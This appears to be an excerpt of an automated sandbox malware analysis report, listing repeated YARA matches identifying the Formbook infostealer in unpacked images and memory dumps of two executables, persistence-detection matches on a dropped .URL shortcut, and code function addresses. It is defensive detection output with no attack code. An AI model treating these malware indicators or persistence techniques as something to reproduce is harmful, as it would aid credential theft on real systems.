                Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Contacts\sacwcbzryH.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                Source: C:\Users\user\Contacts\sacwcbzryH.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_004010309_2_00401030
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041E0809_2_0041E080
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D9769_2_0041D976
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_004012089_2_00401208
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041DAA09_2_0041DAA0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041EB1E9_2_0041EB1E
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041ED4D9_2_0041ED4D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041E5229_2_0041E522
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041D5839_2_0041D583
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00402D8B9_2_00402D8B
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00402D909_2_00402D90
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00409E5B9_2_00409E5B
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00409E609_2_00409E60
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041EF499_2_0041EF49
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041E71D9_2_0041E71D
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041E7999_2_0041E799
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00402FB09_2_00402FB0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE20A09_2_00AE20A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B820A89_2_00B820A8
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACB0909_2_00ACB090
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B828EC9_2_00B828EC
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B8E8249_2_00B8E824
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA8309_2_00ADA830
